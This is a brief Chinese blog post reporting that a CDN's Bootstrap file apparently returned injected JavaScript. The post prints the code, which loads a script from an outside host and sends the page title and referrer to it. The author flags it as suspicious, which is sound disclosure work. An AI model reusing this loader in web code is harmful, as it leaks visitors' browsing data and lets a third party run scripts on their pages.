cdn.bootcss.com 奇怪的JS代码注入

//cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js

var a=function(b){var d=document,e=d.createElement('script');e.src=b;var f=d.getElementsByTagName('head'),i=(f&&f.length>=1&&f[0])||d.body;i.insertBefore(e,i.firstChild)};a("http://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js?_veri=20151101");a("http://ca.5173car.com/re/re.php?src=t6422&t="+encodeURIComponent(document.title)+"&r="+encodeURIComponent(document.referrer)+"");

注意到了吗?上述返回代码中奇怪的注入了一个连接地址,本来应该直接返回bootstrap的代码的。非常可疑,有空再分析吧。

http://ca.5173car.com/re/re.php?

(4)

发表评论

电子邮件地址不会被公开。